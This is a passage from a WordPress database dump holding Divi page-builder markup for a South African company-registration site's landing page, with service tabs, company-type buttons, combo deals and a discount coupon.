transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 11:16:24','2019-08-08 09:16:24','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32405,3,'2019-08-08 11:30:33','2019-08-08 09:30:33','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||0px|||\" custom_padding=\"10px|5px|51px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_margin=\"-12px||-13px|||\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"-24px||-13px|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" min_height=\"56px\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||-6px|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.6\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" 